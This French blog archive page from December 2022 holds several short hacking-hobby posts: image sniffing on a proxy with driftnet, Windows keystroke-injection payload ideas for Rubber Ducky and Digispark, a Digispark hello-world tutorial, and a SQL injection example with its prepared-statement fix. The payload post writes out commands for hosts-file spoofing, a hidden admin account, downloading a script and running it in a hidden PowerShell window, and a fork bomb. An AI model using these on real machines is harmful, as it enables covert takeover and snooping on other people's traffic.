Mois : décembre 2022

Vous avez accès à un serveur Proxy en ssh ?

Que diriez-vous de voir toutes les images qui passent par ce serveur ?

C’est très simple. Cela se fait via le package driftnet.

sudo apt-get install driftnet

sudo driftnet -i eth0 -w

Maintenant, à partir de votre navigateur, accèdez à l’adresse http://ip_du_serveur:9090

Toutes les images qui passeront en clair via l’interface réseau du serveur s’afficheront dans votre navigateur.

Comique. Non ? (Mais peut-être pas très GDPR – bien que… les images n’étant pas associées à un utilisateur, ça peut passer)

Si vous êtes joueur, vous pouvez, via une attaque de l’homme du milieu ou une mise en monitoring de votre port réseau analyser tout ce qui passe dans le réseau. Mais ceci est une autre histoire, qui sera contée une autre fois.

Encore un article sur le Rubber Ducky ? Pas vraiment.

On trouve sur le net beaucoup de payload pour les injecteurs claviers tel que le Rubber Duccky, DigiSpark et autres.

Les créateurs de ces payloads sont souvent très inventif. Dans cet article, je detaillerais certaines de leurs idées.

Quels idées sous Windows

Cela se fait via l’interpreteur de commande (cmd) ou via powershell. Vous pouvez aussi executer une commande powershell en cmd:

powershell <vos instructions powershell>

La plupart des idées ont été reprises de ce GitHub.

Tricher avec le DNS

Pour vous faire passer pour un serveur connu (via cmd)

ECHO 143.166.83.38 www.google.com >> C:/WINDOWS/SYSTEM32/DRIVERS/ETC/HOSTS

Création d’un utilisateur avec le droit admin

On crée l’utilisateur ‘accName’ avec le mot de passe ‘P@ssW0rD’ et on le met dans le groupe ‘Administrators’. Le groupe doit sans doute être modifié sur un PC dont la langue n’est pas l’anglais (via powershell)

$pass = ConvertTo-SecureString "P@ssW0rD" -AsPlainText -Force; New-LocalUser "accName" -Password $pass; Add-LocalGroupMember -Group "Administrators" -Member "accName" 

Masquage d’un utilisateur

On masque l’utilisateur ‘accName’ (via powershell). Cela montre aussi comment manipuler la base de registre en powershell (toujours intéressant)

New-Item -Path "'HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon'" -Name "SpecialAccounts"

New-Item -Path "'HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccounts'" -Name "UserList"

New-ItemProperty -Path "'HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList'" -Name "accName" -Value "0"  -PropertyType DWORD

Téléchargement d’un fichier

On télécharge un fichier (un autre powershell par exemple) sur notre disque. Soyez attentif où vous sauvez. Tous les répertoires ne sont pas forcément accessible en écriture;

$client = new-object System.Net.WebClient

$client.DownloadFile("https://scriptURL" , "%USERPROFILE%script.ps1")

Execution d’un powershell (caché)

Vous voulez executer le script précedemment téléchargé dans une fenêtre cachée ? (via cmd)

powershell.exe -windowstyle hidden -File %USERPROFILE%\script.ps1

Bloquer le PC indéfiniment

Sans commentaire 😉

for /l %%x in (0, 0, 0) do start

Changement du fond d’écran

Ca ne sert à rien, mais c’est toujours amusant. (via cmd)

reg add "HKCUControl PanelDesktop" /v WallPaper /d "%USERPROFILE%doge.jpg" /f

RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True

Faire parler le PC

Ca ne sert à rien, mais c’est toujours amusant (bis). (via powershell)

Add-Type -AssemblyName System.speech;

$speak = New-Object System.Speech.Synthesis.SpeechSynthesizer

$speak.Speak("T'as pris quoi comme résolution pour cette nouvelle année ? 1080p.")

Si cela vous a plu, n’hésitez pas à le dire, il y a encore de quoi en faire quelques articles.

J’ai enfin reçu mes Digispark, la petite clef usb avec son processeur ATtiny85.

Nous verrons donc dans ce post comment faire notre premier hello world.

Tout d’abord, nous installons l’application de developpement Arduino disponible sur leur site.

Un fois installé, nous ajoutons la bibliothèque nécessaire pour gérer le Digispark.

Dans les préférences, selectionnez le champ URL de gestionnaire de cartes supplémentaires et ajoutez cette ligne:

http://digistump.com/package_digistump_index.json

Dans le gestionnaire de cartes, sélectionnez Digistump AVR Boards et installez le.

En ce qui concerne le driver pour le Digispark, il n’est pas nécessaire pour macOS. Je n’en parlerai donc pas. Pour Linux ou Windows, les explications sont sur le site de digistump.com.

Le plus gros est fait. Nous pouvons maintenant créer notre application.

Dans le menu Outils, nous changeons le type de carte pour prendre le Digispark (Default – 16.5mhz).

Dans le menu Fichier, nous créeons un nouveau fichier et remplaçons le sketch par celui-ci:

#include "DigiKeyboard.h"

void setup() {
   // initialize the digital pin as an output.
   pinMode(0, OUTPUT); //LED sur le Model B
   pinMode(1, OUTPUT); //LED sur le Model A
   DigiKeyboard.delay(5000); // attend 5000ms avant la première execution afin de permettre au système d'initaliser notre clef
  }

void loop() {
   DigiKeyboard.sendKeyStroke(0);  // pour eviter de perdre le premier caractère sur certains système
   DigiKeyboard.println("Hello World!");  // Envoye le Hello World!
   DigiKeyboard.delay(5000); // on attend à nouveau 5000ms pour relancer nos commandes
 }

Avant d’insérer le Digispark, nous appuyons sur le bouton contenant la flèche pour lui téléverser notre script.

Quand la compilation est finie, la console affiche le texte suivant:

Running Digispark Uploader...

Plug in device now... (will timeout in 60 seconds)

Nous pouvons donc insérer le Digispark dans votre port USB. Cela prend quelques secondes et si tout va bien, l’écran affichera le message Hello World! toutes les 5 secondes. (en mode QWERTY. Il y a moyen de le faire passer en AZERTY, mais ceci est une autre histoire, qui sera contée une autre fois.)

Evidemment, il est necessaire de vite lancer un éditeur de texte qui recevra les appuis des touches afin de ne pas perturber le système 😉

Remarques

Sous macOS, lors de la compilation, si vous avez le message suivant:

fork/exec /Users/XXXXX/Library/Arduino15/packages/arduino/tools/avr-gcc/4.8.1-arduino5/bin/avr-g++: bad CPU type in executable

Error compiling for board Digispark (Default - 16.5mhz).

Quittez l’IDE Arduino, et tapez ces lignes dans votre terminal pour corriger les liens vers le compilateur:

cd ~/Library/Arduino15/packages/arduino/tools/avr-gcc

mv 4.8.1-arduino5 orig.4.8.1

ln -s /Applications/Arduino.app/Contents/Java/hardware/tools/avr 4.8.1-arduino5

Une requète sql mal écrite peut faire beaucoup de dégats. C’est encore plus vrai avec du code php utilisé n’importe comment.

Imaginez le script php suivant:

$username=$_POST['username'];
$password=$_POST['password'];
$q="select * from `user` where `Userid`='".$username."' and  `Password`='".$password."'";
$res=mysqli_query($l, $q);
if(mysqli_num_rows($res)>0)
...

Rien d’extraordinaire. Le programmeur débutant aura vite faite de faire ce genre de code.

Maintenant, imaginez (encore) que la valeur OR ‘1’ = ‘1’ — soit passée dans le champ username.
La requète exécutée serait donc

SELECT *
FROM  `user`
WHERE `Userid` =  ''
OR  '1' =  '1' -- and `Password` = 'password'

La deuxième partie du query qui vérifie le password est ignorée grâce au -- et avec la condition '1'='1', tout les lignes de la table user sont renvoyés.

Dangereux, non ?

Développeur php, ne créez pas vos requètes de cette manière. D’autres options existent tel que

$sql = "SELECT * from `user` where `Userid` = ? and `Password` = ?";
$stmt = $conn->prepare($sql);
$stmt->bind_param('ss', $_POST['username'], $_POST['password']);
$stmt->execute();

A peine plus long, mais tellement plus sécure.